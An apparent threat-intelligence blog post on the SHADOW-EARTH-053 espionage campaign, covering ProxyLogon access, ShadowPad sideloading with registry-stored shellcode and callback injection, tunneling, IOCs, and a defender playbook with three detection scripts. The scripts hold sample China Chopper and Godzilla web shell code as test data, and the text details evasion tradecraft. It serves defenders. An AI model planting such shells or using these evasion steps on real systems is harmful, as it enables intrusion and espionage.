TL;DR
A newly disclosed China-linked threat cluster, SHADOW-EARTH-053, has been running a quiet, patient cyberespionage campaign against government ministries, defense contractors, and critical infrastructure across eight countries since at least December 2024. The group exploits the five-year-old ProxyLogon chain on still-unpatched Microsoft Exchange servers, drops Godzilla web shells, and after up to eight months of pre-positioning deploys ShadowPad through a DLL sideloading chain that keeps its shellcode in the registry and executes it through a Windows API callback, a design aimed squarely at EDR logic that keys on process names and direct thread-creation calls. A sibling cluster, SHADOW-EARTH-054, shares tooling and victimology across roughly half of all targets. Tom Kellermann of TrendAI called them "the younger brother and sister of the Typhoon campaigns", and the comparison is apt: strategic pre-positioning, geopolitical timing, and suspected destructive intent define this operation's DNA.
Background
The Typhoon family — Volt, Salt, Silk — set the template: burrow into critical infrastructure years before the operational need arises, stay invisible until you're needed for espionage or sabotage. The February 2024 CISA/NSA Volt Typhoon advisory confirmed that this model was no longer theoretical. What Trend Micro's TrendAI research division disclosed this week is the next iteration: a new cluster of at least two coordinated Chinese espionage groups operating under the shared umbrella designation SHADOW-EARTH-053 / SHADOW-EARTH-054, with confirmed victims in eight countries and active, unresolved access across multiple defense-sector environments as of late April 2026.
The cluster was first named publicly on April 30, 2026, in The Register's exclusive interview with TrendAI VP Tom Kellermann, with the full Trend Micro report by researchers Daniel Lunghi and Lucas Silva following the next day. Attribution confidence is assessed as medium-high: tooling overlaps with at least three previously documented China-aligned clusters (CL-STA-0049 tracked by Unit 42, REF7707 tracked by Elastic, Earth Alux tracked by Trend Micro), and the use of ShadowPad, a backdoor privately shared among China-nexus state-sponsored actors rather than sold on open criminal markets, is treated as a strong indicator of a People's Republic of China (PRC) nexus.
Victim geography: Pakistan, Thailand, Malaysia, India, Myanmar, Sri Lanka, Taiwan, and — most diplomatically significant — Poland, a NATO member. Sectors include government ministries, defense contractors, technology firms, and transportation.
Technical Analysis
Phase 1 — Initial Access: ProxyLogon in 2026
The group's primary entry vector in 2026 is still ProxyLogon — a vulnerability chain disclosed five years ago in March 2021. The chain consists of:
- CVE-2021-26855 (pre-authentication server-side request forgery; the entry point that lets an unauthenticated attacker act as the Exchange server against its own backend)
- CVE-2021-26857 (insecure deserialization in the Unified Messaging service, giving code execution as SYSTEM)
- CVE-2021-26858 and CVE-2021-27065 (post-authentication arbitrary file write, used to stage a web shell once 26855 has supplied the authentication)
That this chain is still productive in 2026 is not a failure of threat intelligence; it has featured in the US government's routinely-exploited-vulnerabilities advisories since 2021. It is a failure of patch operations. Exchange servers kept alive for legacy integrations, ministry networks that are rarely maintained, and resource-constrained agencies in developing countries present an enormous attack surface to an adversary willing to scan patiently.
Where ProxyLogon failed or was already patched, SHADOW-EARTH-053 switched to CVE-2025-55182 (React2Shell), a critical CVSS 10.0 remote code execution vulnerability in React Server Components disclosed in December 2025. This secondary vector was used to deliver a Linux version of NoodleRAT (aka ANGRYREBEL), confirming that the group operates cross-platform and adapts initial access tooling to the target environment.
Phase 2 — Persistence: Godzilla Web Shells
Following successful exploitation, the group deploys Godzilla web shells on the compromised Exchange and IIS servers. Godzilla, a publicly available web shell management framework favored by several Chinese APT clusters, provides encrypted command execution, file management, and plugin-based extensibility. Because its request and response bodies are encrypted with a per-shell key, the traffic looks like ordinary HTTPS POSTs to any proxy that does not decrypt and inspect it.
Crucially, SHADOW-EARTH-053 is observed waiting up to eight months between initial web shell placement and the final-stage backdoor deployment. This patience is a hallmark of pre-positioning strategy: the group assesses the target, maintains covert access, and only commits the heavier-weight implant when operational confidence is high.
Phase 3 — ShadowPad Deployment via Registry-Stored Shellcode
The ShadowPad backdoor, a modular, encrypted RAT linked to APT41 and shared among at least a dozen China-aligned groups since 2019, is delivered through a DLL sideloading chain built specifically to evade security tooling that relies on process-name matching rather than binary hash verification.
The chain:
1. A legitimate Toshiba Bluetooth Stack executable is renamed to CIATosBtKbd.exe and deployed on the victim system.
2. The renamed binary sideloads a malicious DLL named TosBtKbd.dll.
3. Rather than embedding the ShadowPad payload in the DLL, the loader calls GetComputerNameA to obtain the hostname and opens a machine-specific Windows Registry key at:
HKEY_CURRENT_USER\Software\[ComputerName]
Here it reads a binary value named scode, the encrypted shellcode payload. Because the key name is derived from the hostname and the payload never touches the DLL on disk, a sample lifted from one machine yields nothing to static analysis or a sandbox; the final implant exists only on the victim.
4. The shellcode is copied into memory allocated with VirtualAlloc as PAGE_EXECUTE_READWRITE. An RWX region is itself a detectable anomaly: legitimate code rarely needs memory that is both writable and executable.
5. Execution is triggered by callback injection through EnumDesktopsA, a legitimate user32 API that enumerates desktops and invokes a caller-supplied callback once per desktop. The loader passes the shellcode address as that callback, so the first invocation by the OS lands in the shellcode. No CreateThread, CreateRemoteThread or similar thread-creation call is ever made, which is what most EDR userland hooks watch for.
Persistence is achieved via a Scheduled Task named "M1onltor" (a look-alike of "Monitor" with a digit one and a lowercase L standing in for the letters), configured to execute every five minutes with the highest available privileges.
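Two of the artefacts in the chain above are cheap to hunt for across a fleet because they have almost no legitimate counterpart: a large high-entropy REG_BINARY blob under HKCU\Software\<ComputerName>, and a scheduled-task name that only reads as a system word after homoglyph substitution. The script below is an added example (not code from the Trend Micro report) that runs both checks offline over constructed input; on a live host the registry records would come from winreg or a reg.exe export of each user's hive, and the task names from Get-ScheduledTask. It keys on location and entropy rather than the literal value name scode, so a renamed value still surfaces.

```python
"""Hunt for the ShadowPad loader artefacts described in Phase 3.

Added example, not code from the Trend Micro report. Two offline checks:
  1. REG_BINARY values under HKCU\\Software\\<ComputerName> whose data is
     large and high-entropy (encrypted shellcode). The report's value name is
     'scode', but the check keys on location and entropy, not the name.
  2. Scheduled-task names containing digit/letter homoglyphs that, once
     folded, sit within a couple of edits of a benign word
     (M1onltor -> 'mionitor', one edit from 'monitor').
SAMPLE_RECORDS and SAMPLE_TASKS are constructed for this example.
"""
import math
import random


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is uniform random; ciphertext sits close to it."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def hunt_registry(records, computer_name, min_len=256, min_entropy=7.0):
    """records: iterable of (key_path, value_name, value_type, data_bytes)."""
    target = f"HKEY_CURRENT_USER\\Software\\{computer_name}".lower()
    hits = []
    for key, name, vtype, data in records:
        if key.lower() != target or vtype != "REG_BINARY":
            continue
        ent = shannon_entropy(data)
        if len(data) >= min_len and ent >= min_entropy:
            hits.append({"key": key, "value": name, "len": len(data),
                         "entropy": round(ent, 2)})
    return hits


# Characters attackers swap in for look-alikes; fold them back before comparing.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "i", "l": "i", "|": "i",
                            "3": "e", "5": "s", "$": "s"})


def fold(name: str) -> str:
    return name.lower().translate(HOMOGLYPHS)


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


LURES = ("monitor", "update", "system", "service", "windows", "defender")


def hunt_task_names(task_names, max_dist=2):
    """Flag names that contain homoglyph characters and, once folded, are within
    max_dist edits of a lure word. Names with no homoglyphs are left alone, so a
    genuine 'Monitor' task is never flagged."""
    hits = []
    for t in task_names:
        folded = fold(t)
        if folded == t.lower():
            continue
        for lure in LURES:
            if edit_distance(folded, lure) <= max_dist:
                hits.append({"task": t, "looks_like": lure})
    return hits


# --- constructed sample data ---
COMPUTER = "WS-FIN-0042"
_rng = random.Random(20260430)
SAMPLE_RECORDS = [
    (f"HKEY_CURRENT_USER\\Software\\{COMPUTER}", "scode", "REG_BINARY",
     _rng.randbytes(4096)),                                   # encrypted-shellcode stand-in
    (f"HKEY_CURRENT_USER\\Software\\{COMPUTER}", "ver", "REG_SZ", b"1.0"),
    ("HKEY_CURRENT_USER\\Software\\Contoso\\App", "blob", "REG_BINARY",
     _rng.randbytes(4096)),                                   # same entropy, wrong key
    (f"HKEY_CURRENT_USER\\Software\\{COMPUTER}", "pad", "REG_BINARY", bytes(512)),  # low entropy
]
SAMPLE_TASKS = ["M1onltor", "Monitor", "MicrosoftEdgeUpdateTaskMachineUA",
                "OneDrive Standalone Update Task-S-1-5-21-1234"]

if __name__ == "__main__":
    print(hunt_registry(SAMPLE_RECORDS, COMPUTER))
    print(hunt_task_names(SAMPLE_TASKS))
```

Because the key lives under HKCU, the check has to be run against every user hive on the host (HKU\<SID> for logged-on users, NTUSER.DAT for the rest), not just the hive of whoever is running the hunt.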
Phase 4 — Tunneling and Lateral Movement
SHADOW-EARTH-053 deploys a layered tunneling architecture to maintain covert command-and-control:
- IOX — Go-based port-forwarding and proxy tool. Alongside it, the operators created local accounts and set LocalAccountTokenFilterPolicy=1, which disables UAC remote token filtering so that local administrator accounts authenticate over the network with full privileges, enabling Pass-the-Hash for lateral movement.
- GOST (GO Simple Tunnel) — Open-source Go-based tunneling tool, configured to establish SOCKS5 proxies and relay-based reverse WebSocket tunnels to external C2 infrastructure.
- Wstunnel — Deployed as wt.exe, tunneling SOCKS5 traffic over HTTPS to the same C2 endpoint.
All three tunneling tools were staged in C:\Users\Public, a directory writable by every local user and consistent with the group's documented preference. Three tools pointing at the same C2 IP suggests operational redundancy: if one is detected and blocked, the other channels keep connectivity. It also means the IP, not the tool, is the control worth applying.
Lateral movement is accomplished using:
- Mimikatz for credential harvesting and privilege escalation
- Sharp-SMBExec — a C# reimplementation of SMBExec — for remote execution over SMB
- WMIC for backdoor installation on additional hosts
- A suspected custom RDP launcher deployed under the system-binary name smss.exe
System binaries (net.exe, PowerShell) are copied under randomized $[RANDOM].log names (e.g., $D5PLAA1.log, $VMB9AIT.log) to defeat process-name-based detection. The copies are byte-identical to the originals, so their hashes still match the Microsoft binaries and the OriginalFileName field in Sysmon process-creation events, which comes from the PE version resource, still reads net.exe or powershell.exe.
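The renamed-binary trick, the C:\Users\Public staging and the LocalAccountTokenFilterPolicy change each leave a clean signal in ordinary Sysmon telemetry. The script below is an added example (not code from the Trend Micro report) that runs four rules over constructed events modelled on Sysmon's field names for Event ID 1 (ProcessCreate), 11 (FileCreate) and 13 (RegistryEvent value set); the events themselves are made up for the example. The detail that makes R1 work is that a renamed copy of net.exe still reports OriginalFileName=net.exe.

```python
"""Triage constructed Sysmon-style events for the Phase 4 tradecraft.

Added example, not code from the report. Field names follow Sysmon's schema
(EventID 1 ProcessCreate, 11 FileCreate, 13 RegistryEvent value set); the
events are constructed for this example.

Rules:
  R1  renamed LOLBin: OriginalFileName is a known binary but the on-disk name differs
  R2  executable staged in, or launched from, C:\\Users\\Public\\
  R3  LocalAccountTokenFilterPolicy set to 1 (remote UAC token filtering off)
  R4  smss.exe running from anywhere but System32 (RDP launcher masquerade)
"""
import re

LOLBINS = {"net.exe", "net1.exe", "powershell.exe", "wmic.exe", "reg.exe", "rundll32.exe"}
PUBLIC = "c:\\users\\public\\"
SYSTEM32 = "c:\\windows\\system32\\"
LATFP = "\\currentversion\\policies\\system\\localaccounttokenfilterpolicy"
RANDOM_LOG = re.compile(r"\\\$[A-Z0-9]{6,8}\.log$", re.IGNORECASE)  # $D5PLAA1.log style
EXEC_EXT = (".exe", ".dll")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Rule ids matched by a single event, in rule order."""
    matched = []
    eid = ev["EventID"]
    if eid == 1:
        image = ev["Image"].lower()
        orig = ev.get("OriginalFileName", "").lower()
        if orig in LOLBINS and basename(image) != orig:
            matched.append("R1")
        if image.startswith(PUBLIC):
            matched.append("R2")
        if basename(image) == "smss.exe" and not image.startswith(SYSTEM32):
            matched.append("R4")
    elif eid == 11:
        tf = ev["TargetFilename"]
        if tf.lower().startswith(PUBLIC) and (tf.lower().endswith(EXEC_EXT) or RANDOM_LOG.search(tf)):
            matched.append("R2")
    elif eid == 13:
        # Sysmon renders DWORD values as 'DWORD (0x00000001)'
        if ev["TargetObject"].lower().endswith(LATFP) and "0x00000001" in ev.get("Details", ""):
            matched.append("R3")
    return matched


def triage(events):
    """[(event, rules)] for every event that hit at least one rule."""
    out = []
    for ev in events:
        rules = evaluate(ev)
        if rules:
            out.append((ev, rules))
    return out


# --- constructed events, modelled on Sysmon fields ---
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\Public\\$D5PLAA1.log", "OriginalFileName": "net.exe",
     "CommandLine": "$D5PLAA1.log user svc_bk P@ss /add"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\net.exe", "OriginalFileName": "net.exe",
     "CommandLine": "net use"},
    {"EventID": 11, "TargetFilename": "C:\\Users\\Public\\wt.exe"},
    {"EventID": 11, "TargetFilename": "C:\\Users\\Public\\notes.txt"},
    {"EventID": 13, "Details": "DWORD (0x00000001)", "TargetObject":
     "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy"},
    {"EventID": 13, "Details": "DWORD (0x00000001)", "TargetObject":
     "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"},
    {"EventID": 1, "Image": "C:\\Users\\Public\\smss.exe", "OriginalFileName": "",
     "CommandLine": "smss.exe 10.0.0.40"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\smss.exe", "OriginalFileName": "smss.exe",
     "CommandLine": "\\SystemRoot\\System32\\smss.exe"},
]

if __name__ == "__main__":
    for ev, rules in triage(SAMPLE_EVENTS):
        print(rules, ev.get("Image") or ev.get("TargetFilename") or ev.get("TargetObject"))
```

R1 also works on hashes, since the copies are unmodified Microsoft binaries: any process whose image hash equals net.exe's but whose path is not System32 or SysWOW64 is the same finding.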
NoodleRAT for Linux Targets
The Linux variant of NoodleRAT (ELF, also tracked as ANGRYREBEL and Nood RAT) was retrieved from C2 server 194.38.11.3:1790 and observed communicating with:
check.office365-update[.]com
The domain was registered November 19, 2025. Its naming, impersonating a Microsoft update service, follows a pattern seen in other SHADOW-EARTH-053 infrastructure, suggesting a shared domain registration profile. GTIG (Google Threat Intelligence Group) attributes the NoodleRAT chain specifically to the overlapping cluster UNC6595.
SHADOW-EARTH-054 Overlap
Approximately 50% of SHADOW-EARTH-053's victims were also compromised by SHADOW-EARTH-054 — a related but non-identical cluster sharing identical tool hashes, overlapping CVE exploitation, and the same C2 infrastructure. No direct operational coordination has been confirmed, but the tooling and victim overlap suggest shared supply or shared leadership at the resource provision layer. SHADOW-EARTH-054 has additional network overlaps with:
- CL-STA-0049 (Palo Alto Unit 42) — identified in the SquidDoor campaign
- REF7707 (Elastic Security Labs)
- Earth Alux (Trend Micro)
GLITTER CARP and SEQUIN CARP: The Journalist and Activist Angle
Disclosed concurrently by the Citizen Lab, two additional China-aligned clusters target journalists, civil society, and diaspora activists in what appears to be a coordinated influence suppression and intelligence-collection campaign:
GLITTER CARP (also tracked as UNK_SparkyCarp by Proofpoint) focuses on:
- The International Consortium of Investigative Journalists (ICIJ)
- Taiwanese semiconductor industry targets
- Uyghur, Tibetan, Taiwanese, and Hong Kong diaspora communities
Tactics include AiTM (adversary-in-the-middle) phishing kits, OAuth token harvesting, and 1×1 tracking pixels embedded in phishing emails pointing to attacker infrastructure to fingerprint and confirm email opens.
SEQUIN CARP (UNK_DualTone / UTA0388) targets specific named international journalists — including ICIJ journalist Scilla Alecci — who cover topics of direct sensitivity to the Chinese government.
Both clusters share infrastructure, domain registration patterns, and impersonation techniques across their campaigns, suggesting common resource provisioning with SHADOW-EARTH-053.
Indicators of Compromise (IOCs)
| Type | Indicator | Notes |
|------|-----------|-------|
| IP | 141.164.46.77 | mdync.exe beaconing C2 |
| IP | 96.9.125.227 | GOST/Wstunnel SOCKS5 C2 (port 8067) |
| IP | 194.38.11.3:1790 | ShadowPad + NoodleRAT retrieval server |
| Domain | check.office365-update[.]com | NoodleRAT Linux C2 (reg. Nov 19, 2025) |
| File | CIATosBtKbd.exe | Trojanized Toshiba Bluetooth executable |
| File | TosBtKbd.dll | Malicious sideloaded DLL |
| File | mdync.exe | Custom beaconing tool |
| File | wt.exe | Wstunnel deployment |
| Registry | HKCU\Software\[ComputerName]\scode | Shellcode payload storage |
| Sched. Task | M1onltor | Persistence (every 5 min, highest privileges) |
| CVEs | CVE-2021-26855/26857/26858/27065 | ProxyLogon chain (Exchange) |
| CVE | CVE-2025-55182 | React2Shell (React Server Components RCE) |
| Technique | EnumDesktopsA callback injection | Shellcode execution evasion |
| Staging path | C:\Users\Public\ | Tool staging directory |
| Rename pattern | $[RANDOM].log | System binary obfuscation |
Lyrie Take
SHADOW-EARTH-053 is textbook strategic pre-positioning. The eight-month dwell before ShadowPad deployment closely mirrors Volt Typhoon's modus operandi, and Tom Kellermann's concern isn't hyperbolic: an implant that sleeps for months produces no C2 traffic to audit until its operators decide to wake it. If the group pre-positioned destructive capability alongside its espionage tooling, as Volt Typhoon is assessed to have done in US critical infrastructure, then the defense-sector victims in eight countries, including a NATO member, may be hosting dormant sabotage payloads.
What makes this particularly alarming for security operations: the ShadowPad delivery chain is built to defeat process-name-based EDR logic. Registry-stored shellcode that only materialises at runtime, entered through a legitimate Windows API callback, will not trigger signature-based AV. Catching it requires behavioral telemetry (userland API hooks, ETW, or kernel callbacks) correlated across the chain: a recently sideloaded DLL inside a known-abused host binary, an RWX VirtualAlloc, and EnumDesktopsA invoked with a callback that points into heap memory rather than into a loaded module. The M1onltor scheduled task name passes as a system artifact at first glance.
The ProxyLogon exploitation in 2026 is not a sophisticated move — it's a statement about the state of enterprise patching. Five-year-old critical vulnerabilities should be a solved problem. They aren't. The path forward requires continuous attack-surface monitoring, not periodic patch cycles.
Defender Playbook
Immediate Actions:
1. Audit Exchange and IIS patch state. Run Get-ExchangeServer | Format-List Name,AdminDisplayVersion and compare the build against Microsoft's Exchange build table, or run Microsoft's HealthChecker.ps1 (CSS-Exchange), which does that comparison for you; then run Microsoft's Test-ProxyLogon.ps1 to look for exploitation indicators in the HttpProxy, OABGenerator and Unified Messaging logs. Any internet-exposed Exchange server that did not receive the March 2021 Security Updates before it was exposed should be treated as compromised, not merely vulnerable.
2. Scan for web shell artifacts. China Chopper-style one-liners are a single eval() of a request parameter, for example:
<%@Page Language="Jscript"%><%eval(Request.Item[...])%>
Godzilla's generated ASPX shells look different: no eval(), but a read of the POST body (Request.BinaryRead or Request.InputStream), decryption with a hard-coded key (RijndaelManaged/AES or XOR), and a System.Reflection.Assembly.Load of the result. Grep IIS wwwroot and the Exchange OWA, ECP and Autodiscover directories for both patterns, and diff the .aspx inventory against a known-good Exchange install of the same build; any file that is not in the baseline is suspect regardless of content.
3. Hunt for M1onltor scheduled tasks. Query across your environment:
Get-ScheduledTask | Where-Object { $_.TaskName -like "*M1onltor*" }
4. Inspect HKCU registry for scode binary values. The registry key pattern HKCU\Software\[ComputerName] with a scode binary value is a strong IOC with near-zero legitimate use. Because the key is per-user, check every loaded hive under HKU\<SID> and the NTUSER.DAT of users who are not logged on, not just the hive of the account running the hunt.
5. Block C2 IPs at perimeter. Add 141.164.46.77, 96.9.125.227, and 194.38.11.3 to your threat intelligence firewall block lists immediately.
6. Detect tunneling tool deployment at C:\Users\Public. Monitor file creation events in C:\Users\Public\ for Go-compiled binaries and any executables with names matching wt.exe, IOX components, or GOST configurations.
7. Audit LocalAccountTokenFilterPolicy. A value of 1 at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System significantly expands Pass-the-Hash blast radius. Revert to 0 unless there is a documented operational requirement.
8. Patch CVE-2025-55182 (React2Shell). If running React Server Components, upgrade to the patched React packages released in December 2025 (and to frameworks that bundle them, such as Next.js) immediately. This vector is actively exploited in the wild.
9. Inspect DNS for office365-update[.]com variants. The domain registration pattern suggests additional lookalike domains in the same campaign infrastructure. Query your DNS logs for office365-update.com and variations thereof.
10. Hunt for renamed system binaries. Query Sysmon process-creation events (Event ID 1) where OriginalFileName is net.exe, net1.exe or powershell.exe but the Image path ends in .log or sits outside System32; hashes work equally well, since the copies are byte-identical to the originals.
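Items 2 and 9 above are the two hunts most often done with a one-line grep, and a one-line grep misses both: Godzilla's shells contain no eval(), and a search for the literal office365-update.com misses sibling registrations. The script below is an added example (not code from the Trend Micro report) that scores ASPX content against the China Chopper and Godzilla loader patterns and flags DNS queries for Microsoft-branded domains that are not Microsoft's. The ASPX samples and DNS lines are constructed; the Godzilla sample follows the shape of the public C#/AES template with a made-up key.

```python
"""Playbook items 2 and 9: web shell scan and look-alike domain check.

Added example, not from the report. CHOPPER, GODZILLA, PLUGIN_LOADER, BENIGN
and SAMPLE_DNS are constructed for this example. The Godzilla sample mirrors
its C#/AES template shape (read POST body, decrypt with a hard-coded key,
Assembly.Load, CreateInstance) and contains no eval().
"""
import re

SIGNATURES = {
    "chopper_eval":    re.compile(r"eval\s*\(\s*Request\.(?:Item|Form)\s*\[", re.I),
    "assembly_load":   re.compile(r"\bAssembly\.Load\s*\(", re.I),
    "decryptor":       re.compile(r"\b(?:RijndaelManaged|Aes(?:CryptoServiceProvider|Managed)?|TripleDES)\b"
                                  r"[^;]{0,200}CreateDecryptor", re.I | re.S),
    "body_read":       re.compile(r"Request\.(?:BinaryRead|InputStream)\b", re.I),
    "xor_loop":        re.compile(r"\[\s*\w+\s*\]\s*\^\s*"),
    "create_instance": re.compile(r"\.CreateInstance\s*\(", re.I),
}
STRONG = {"chopper_eval"}
LOADER, SOURCE = {"assembly_load"}, {"decryptor", "body_read", "xor_loop"}


def scan_aspx(content: str) -> dict:
    """Graded verdict for one file: a Chopper eval, or Assembly.Load fed from a
    decrypted/raw request body, is a shell; a lone Assembly.Load needs review."""
    found = [name for name, rx in SIGNATURES.items() if rx.search(content)]
    fs = set(found)
    if fs & STRONG or (fs & LOADER and fs & SOURCE):
        verdict = "webshell"
    elif found:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "signatures": found}


# Domains Microsoft actually serves from; a brand token anywhere else is suspect.
MS_DOMAINS = {"microsoft.com", "microsoftonline.com", "office.com", "office365.com",
              "office.net", "windowsupdate.com", "live.com", "msftncsi.com", "windows.com"}
BRAND = re.compile(r"(?:office365|o365|microsoft|msft|outlook|onedrive)", re.I)


def registrable(domain: str) -> str:
    """Last two labels: fine for .com/.net; ccSLDs (co.uk) would need the PSL."""
    labels = domain.lower().replace("[.]", ".").strip(".").split(".")
    return ".".join(labels[-2:])


def flag_lookalikes(dns_lines):
    """dns_lines: 'timestamp client qtype qname' records (constructed format)."""
    hits = []
    for line in dns_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        qname = parts[3].replace("[.]", ".")
        reg = registrable(qname)
        if reg not in MS_DOMAINS and BRAND.search(qname.replace("-", "")):
            hits.append({"client": parts[1], "qname": qname, "registrable": reg})
    return hits


# --- constructed samples ---
CHOPPER = '<%@Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
GODZILLA = '''<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%>
<%Session.Add("k","0123456789abcdef"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),
c = Request.BinaryRead(Request.ContentLength);
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k)
 .TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>'''
PLUGIN_LOADER = '<% var asm = System.Reflection.Assembly.Load(System.IO.File.ReadAllBytes(Server.MapPath("bin/plugin.dll"))); %>'
BENIGN = '<%@ Page Language="C#" %><html><body><% Response.Write(DateTime.Now.ToString()); %></body></html>'
SAMPLE_DNS = [
    "2026-04-21T10:02:11Z 10.0.0.25 A check.office365-update.com",
    "2026-04-21T10:02:12Z 10.0.0.25 A outlook.office365.com",
    "2026-04-21T10:03:40Z 10.0.0.31 A login.microsoftonline.com",
    "2026-04-21T10:05:02Z 10.0.0.31 A office365-login.net",
    "2026-04-21T10:05:09Z 10.0.0.31 A cdn.contoso.com",
]

if __name__ == "__main__":
    for name, body in [("chopper", CHOPPER), ("godzilla", GODZILLA),
                       ("plugin", PLUGIN_LOADER), ("benign", BENIGN)]:
        print(name, scan_aspx(body))
    print(flag_lookalikes(SAMPLE_DNS))
```

The "review" verdict exists because Assembly.Load on its own has legitimate uses (plugin loaders, hot-reload); what makes Godzilla a shell is the load being fed from a decrypted request body, which is why the rule requires both halves.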
Strategic Controls:
- Deploy NDR (Network Detection and Response) solutions capable of identifying tunneling-over-HTTPS anomalies, particularly SOCKS5 traffic wrapped in WebSocket channels.
- Implement behavioral monitoring (EDR API telemetry, ETW, or kernel callbacks) that flags anomalous API call chains in non-system processes, in particular an RWX VirtualAlloc followed by EnumDesktopsA with a callback address outside any loaded module.
- Require scheduled task creation to flow through an approved management plane (e.g., via GPO or Intune) and alert on any task created outside that channel.
- For governments and defense contractors: assume Exchange servers with internet exposure have been compromised if ProxyLogon was not patched within the first 30 days of March 2021. Treat those environments as requiring full forensic review before continued operational use.
Sources
1. Trend Micro / TrendAI Research — "Inside Shadow-Earth-053: A China-Aligned Cyberespionage Campaign Against Government and Defense Sectors in Asia" (May 1, 2026)
https://www.trendmicro.com/en_us/research/26/d/inside-shadow-earth-053.html
2. The Hacker News — "China-Linked Hackers Target Asian Governments, NATO State, Journalists, and Activists" (May 2, 2026)
https://thehackernews.com/2026/05/china-linked-hackers-target-asian.html
3. The Register — "Novel Chinese spy group found in critical networks in Poland, Asia" — Exclusive interview with Tom Kellermann (TrendAI VP) (April 30, 2026)
https://www.theregister.com/2026/04/30/chinese_spies_lurking_networks
4. Citizen Lab — "How Chinese Actors Use Impersonation and Stolen Narratives to Perpetuate Digital Transnational Repression" (2026)
https://citizenlab.ca/research/how-chinese-actors-use-impersonation-and-stolen-narratives-to-perpetuate-digital-transnational-repression/
5. GBHackers — "China-Aligned Hackers Deploy ShadowPad in Multi-Stage Espionage Campaign" (May 1, 2026)
https://gbhackers.com/china-hackers-deploy-shadowpad/
Lyrie.ai Cyber Research Division — Senior Analyst Desk
Lyrie Verdict
Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.